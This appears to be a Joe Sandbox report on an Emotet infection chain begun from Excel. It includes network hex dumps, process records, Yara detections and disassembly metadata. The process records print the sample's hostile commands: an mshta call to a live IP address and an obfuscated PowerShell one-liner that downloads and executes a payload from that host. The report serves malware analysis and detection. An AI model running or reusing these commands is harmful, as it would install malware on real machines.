                                                                                                                                Jan 28, 2022 20:41:25.547328949 CET586INData Raw: 16 03 03 00 5d 02 00 00 59 03 03 63 6d c4 87 c3 77 86 d0 1a 10 1a e9 e5 b5 9f 45 8b 9e c5 26 4f 00 aa 4b b5 fd e2 0c 19 da 84 26 20 03 4c c8 af de 42 32 31 b8 93 95 03 2e e6 cc 5a ef 22 b8 72 77 fa 04 5f d1 c4 4e 75 36 75 01 ed c0 28 00 00 11 ff
                                                                                                                                Data Ascii: ]YcmwE&OK& LB21.Z"rw_Nu6u(00\*b0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT De
                                                                                                                                Jan 28, 2022 20:41:25.547360897 CET587INData Raw: bb e6 e1 0e e2 60 f6 55 6b 8f 92 f2 04 2e 50 66 d4 33 13 87 57 75 cc ad cb d2 39 cd 87 f3 a4 4c 13 ec fc 86 04 93 bb c3 24 9a 69 a4 9f 61 27 3b 9f 31 76 5d 04 9c ab 31 c1 71 a7 b3 b4 2e ae 92 aa d7 3b 45 a2 ff c0 98 c8 e2 27 4b c0 63 16 03 03 00
                                                                                                                                Data Ascii: `Uk.Pf3Wu9L$ia';1v]1q.;E'Kc
                                                                                                                                Jan 28, 2022 20:41:25.559819937 CET587OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 af 94 55 08 30 43 de 77 dd 13 79 ca 1e 1f eb 0e 5f b9 60 56 1a 70 00 29 29 90 86 b7 5d 89 e9 25 1c c5 b4 bb bc 7f db f1 bd 20 eb af 39 d5 29 35 0e 79 bb 2e bf 8f 53 53 3b 60 a8 29 12 e1 48 76 14 03 03 00 01 01 16
                                                                                                                                Data Ascii: FBAU0Cwy_`Vp))]% 9)5y.SS;`)Hv`sW0F1j4+j],O|D9]n.?IaL7$.1>~3P%)Bv
                                                                                                                                Jan 28, 2022 20:41:25.872416973 CET587INData Raw: 14 03 03 00 01 01 16 03 03 00 60 36 5b 46 0a 98 d5 f9 c0 3f d7 2f f8 f5 0b f6 39 7b 6a 8a 04 2c f4 3c b6 42 2f dc 0d ef 4c cb bb 80 41 4e bd a5 8a 11 4c 1e f1 5a 93 aa ae 22 6c 38 fd a6 27 9d df 46 84 b8 f8 c8 bf ae a9 3e e3 cf ed 8d 54 77 49 e7
                                                                                                                                Data Ascii: `6[F?/9{j,<B/LANLZ"l8'F>TwIuaBKm#s\
                                                                                                                                Jan 28, 2022 20:41:40.775181055 CET654OUTData Raw: 17 03 03 02 00 82 80 ca 60 ac 69 78 47 98 54 97 66 cb 17 a7 33 61 72 e9 05 bb b5 74 7f 1b 6e 06 fa 67 ae 9e d7 c7 50 9a 7b 7e a8 98 26 4d 65 d3 84 79 ba 5d 67 46 62 af 74 7c 5c 29 35 f1 af 4a c0 00 8f 4b cd 82 83 22 ba ec 76 8a 7f 93 ad 5f c0 ed
                                                                                                                                Data Ascii: `ixGTf3artngP{~&Mey]gFbt|\)5JK"v_%z>?i![6zXu}s"^zhMnd#Yt_jQ%EZt!q28~?Bbjq[{cTSnX+Thum`&<TIp
                                                                                                                                Jan 28, 2022 20:41:41.935688019 CET654INData Raw: 17 03 03 01 e0 9f d0 b1 fb a6 41 6c 23 b5 f1 ce 2e 3f fa 4d 94 00 13 44 60 b1 07 ed b7 ce 10 94 1c a1 eb 6b 83 fa f3 25 4a 37 8e 2f c8 33 e4 5a ff bb 12 d0 99 94 e7 e3 da 05 b6 2c 0c 4e 1a 8e 83 a5 cd 8c ce 74 93 e4 23 49 3e 0d 4c 9b 5b ca 74 0d
                                                                                                                                Data Ascii: Al#.?MD`k%J7/3Z,Nt#I>L[t`.I2(je]tQNrL6}"KYlxa^qqjci;?`EbF*{=t8|c~BgK1 qj=19K:4G5`w}-@
                                                                                                                                Jan 28, 2022 20:41:44.935729027 CET654INData Raw: 15 03 03 00 50 59 4e c2 3b 42 3a 74 3e 41 a1 7c 94 d8 b5 30 62 40 19 b1 d4 3d d1 48 5a a3 cf 18 11 7b 8a 7c 51 da 80 bf 19 9d 52 c8 77 bb c6 4d 15 6f 2b ae a1 eb 48 76 86 74 80 f5 f6 29 93 59 f1 66 45 a6 0d e0 d1 6b 38 f1 f5 b4 54 61 29 dd 0a 2d
                                                                                                                                Data Ascii: PYN;B:t>A|0b@=HZ{|QRwMo+Hvt)YfEk8Ta)-0"9


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:20:39:18
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                Imagebase:0x13fe20000
                                                                                                                                File size:28253536 bytes
                                                                                                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:20:39:21
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
                                                                                                                                Imagebase:0x4a070000
                                                                                                                                File size:345088 bytes
                                                                                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:20:39:21
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:mshta http://91.240.118.172/cc/vv/fe.html
                                                                                                                                Imagebase:0x13fa80000
                                                                                                                                File size:13824 bytes
                                                                                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:20:39:24
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                                Imagebase:0x13f1b0000
                                                                                                                                File size:473600 bytes
                                                                                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:20:39:34
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                Imagebase:0x4a070000
                                                                                                                                File size:345088 bytes
                                                                                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:20:39:34
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450824461.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:20:39:38
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499259204.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499994350.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499873731.0000000002781000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499710740.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499733166.00000000008E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499690055.0000000000881000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499762577.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499359397.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499783564.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.500113987.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.500072770.0000000003051000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499969504.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499804100.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:20:39:58
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.502588343.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.502811029.0000000000771000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:20:40:02
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551880508.0000000002FB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551919962.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551623719.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.550973971.0000000000211000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551989518.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551538985.0000000000901000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551472504.0000000000841000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551824983.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551706896.0000000002861000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551513141.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551450592.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551800161.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.550895567.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551739042.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:20:40:22
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.554134949.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.554075703.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.554395165.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                                General

                                                                                                                                Target ID:16
                                                                                                                                Start time:20:40:26
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677997537.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677450513.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677756106.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677929606.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678314605.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677111483.0000000000951000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677326122.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676639526.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678212374.0000000002D91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676821623.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677356744.0000000002521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677199098.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676670524.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676732773.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678106332.0000000002D31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678697687.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677832444.0000000002C31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678494850.0000000003000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677505319.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677680233.0000000002BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678137863.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678441464.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677297499.0000000002471000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678529505.0000000003031000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678356507.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678048662.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678386689.0000000002E51000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678412347.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Executed Functions

                                                                                                                                  Function 032F1CD6 Relevance: .4, Instructions: 430COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420155080.00000000032F1000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 251a07875837724f5a5292df2b7b9bc7481d0cb7347cf4fa69627356d27410bd
                                                                                                                                  • Instruction ID: 0826abf7d0197d298d7a94908d87c13558ec382c17628834ea982b5bc4d8009e
                                                                                                                                  • Opcode Fuzzy Hash: 251a07875837724f5a5292df2b7b9bc7481d0cb7347cf4fa69627356d27410bd
                                                                                                                                  • Instruction Fuzzy Hash: DDD1262062CB498FCB59DB2C8054620FBE1FF5E348B5849BEE58ECB296D624DCD1C395
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 032F1CD6 Relevance: .4, Instructions: 430COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420155080.00000000032F1000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                  • Associated: 00000004.00000003.420105332.00000000032F0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a919fc72fcc4e118e760d7880dccbdf122af8d4252314851a380f81ce9847186
                                                                                                                                  • Instruction ID: 0826abf7d0197d298d7a94908d87c13558ec382c17628834ea982b5bc4d8009e
                                                                                                                                  • Opcode Fuzzy Hash: a919fc72fcc4e118e760d7880dccbdf122af8d4252314851a380f81ce9847186
                                                                                                                                  • Instruction Fuzzy Hash: DDD1262062CB498FCB59DB2C8054620FBE1FF5E348B5849BEE58ECB296D624DCD1C395
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 032F3124 Relevance: .2, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                  • Associated: 00000004.00000003.420105332.00000000032F0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
                                                                                                                                  • Instruction ID: 34441f809d99657970ac4b97ed697120d760a86570f8913d3df47bbd29e64caa
                                                                                                                                  • Opcode Fuzzy Hash: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
